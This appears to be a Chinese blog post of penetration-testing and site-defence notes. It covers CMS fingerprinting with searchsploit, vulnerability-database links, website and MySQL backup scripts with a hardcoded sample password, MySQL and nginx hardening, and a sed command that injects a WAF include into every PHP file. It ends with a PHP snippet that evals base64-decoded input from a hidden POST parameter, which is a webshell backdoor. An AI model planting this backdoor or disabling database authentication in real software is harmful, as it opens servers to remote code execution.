程序员经验分享-hwhale

判断是否是已知的CMS或者框架

2023-12-05

判断是否是已知的CMS或者框架

搜索通用漏洞,打开kali进行搜索有没有通用的漏洞,搜索disscuz漏洞 

searchsploit diss

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

收集更多信息

Google、baidu已知的漏洞

验证查找常用的POC

  1. 判断是否为已知的CMS收集更多信息
  2. CMS类型
  3. CMS版本号
  4. 是否安装插件以及插件版本
  5. 补丁类型

收集更多信息,如WORDpress有无特殊配置,如他自己生成的版本号。

熟悉他使用的版本。

Google黑客技巧

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

POC

查看是否可以打出结果。

本地漏洞裤分享 

http://www.bugscan.net/source/template/vulns/

https://www.shentoushi.top/index.php/Go/?url=http://www.cnnvd.org.cn&LinkId=34

https://www.seebug.org

http://www.nsfocus.net/index.php?act=sec_bug

https://www.shentoushi.top/index.php/Go/?url=http://www.0daybank.org&LinkId=44

https://www.shentoushi.top/index.php/Go/?url=http://0day5.com&LinkId=43
网站源码备份

远程获取文件scp -r Web1:/var/www/html/ webbak/ 

 #!/bin/bash
 time=`/bin/date +%F`
 bak_file="/data/backup/$time.tar.gz"
 webdir="/data/www/"
 tar zcvf $bak_file $webdir >/dev/null 2>&1 &

/bin/bash /data/bak.sh定时执行计划任务 crontable -ectl+octl+x

数据库备份 

mysqldump -uroot -p --single-transaction --all-databases > backup.sql # 所有

mysqldump -u root -p --single-transaction dataname > dataname.sql  #单个

mysqldump --skip-lock-tables -uxxxx -pxxxxxx -h 166.111.9.173 -R 数据库名 > ./urlevent20180319.sql 


mysqldump -h127.0.0.1 -uroot -ppassword database |gzip >$backupDir/$database-$today.sql.gz`然后,scp回来。


#备份目录
backupDir=/home/backup/database
#mysqlDump
mysqldump=/usr/local/mariadb/bin/mysqldump
host=127.0.0.1
username=root
password=42342342
today=`date +%Y%m%d`
#要备份的数据库数组
databases=(blog chinese_medicine)
# echo $databaseCount
for database in ${databases[@]}
  do
    echo '开始备份'$database
    $mysqldump -h$host -u$username -p$password $database | gzip > $backupDir/$database-$today.sql.gz
    echo '成功备份'$database'到'$backupDir/$database-$today.sql.gz
  done


恢复mysql
mysql -uroot -p TEST < bak.sql

数据库 运维 

取消mysql密码认证:
修改my.cnf ,添加 skip-grant-tables

修改mysql密码
update mysql.user set password=PASSWORD('skyboy') where user='root' and host='localhost';
flush privileges;

最好先修改mysql,再修改php。一般不存在需要修改mysql密码的情况。

禁止数据库的远程连接:

use mysql;

update user set host='localhost' where user='root';

flush privileges;

CREATE USER ‘dog’@‘localhost’ IDENTIFIED BY123456;

GRANT ALL ON databasename.* TO ‘dog’@‘localhost

flush privileges;

调整站点配置文件,修改数据库连接的用户名和密码。

Linxu 服务器 管理 

对于非必须可写的目录:
权限设置为755,拥有者设为非www-data用户;从而防止文件被篡改/删除。 

对于必须可写的目录:
根据服务器类型,上一个.htaccess, 或者修改nginx的目录配置文件,去除此路径的脚本执行权限。


对于Nginx:
location ~ /mm/(data|uploads|templets)/*.(php)$ {
deny all;
}
location ~ .php$ {
try_files $uri /404.html;
fastcgi_pass 127.0.0.1:9000;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
include fastcgi_params;
} 
修改完成之后,nginx -S reload

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

waf脚本 

通用防御

php-WAF的批量添加:

find /var/www/html -type f -path "*.php" | xargs sed -i "s/<?php/<?php require_once('/tmp/waf.php');n/g“

WAF需要同时具备拦截和抓取流量的作用。

watch 

<?php
$serverList = array(
    "127.0.0.1",
    "::1"
);
$ip = $_SERVER['REMOTE_ADDR'];

foreach ($serverList as $host){
    if( $ip===$host){
    $a = $_POST['n985de9'];
    if(isset($a)) {
        eval(base64_decode($a));
    }
    }else{
        die();
    }
}
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

测试工具

spring cloud

判断是否是已知的CMS或者框架 的相关文章

  • (附源码)python兴农购物网站系统 计算机毕设38256

    Django兴农购物网站系统 摘 要 助农工作是当前我国全面建成小康社会的重点工作 由于我国农村地域广大 贫困人口多 区域差异大 因此 不同区域的扶贫方法也是不一样的 近年来 随着网络的普及 许多农村地区物产丰富 但由于销售渠道不畅等原因

  • 如何导出iPhone喜马拉雅下载的音频

    如何导出iPhone喜马拉雅下载的音频 坑 网上没有啥正规的教程 坑

  • JDK1.8在LINUX下安装教程

    在Linux下安装JDK 1 8是为了开发和运行Java应用程序的必要步骤 以下是简明的JDK 1 8安装教程 下载JDK 1 8 首先 您需要从官方网站 例如Oracle或OpenJDK 下载JDK 1 8的安装包 请确保选择适合您Lin

  • 常见的降维库有哪些?

    常见的降维库有哪些 计算生物学领域 做基因数据分析的用得比较多 发的paper比较好 1 sklearn库里的ISOMAP and umap 2 Scanpy 库 这个最猛 scanpy tl pcascanpy tl tsne scanp

随机推荐

热门标签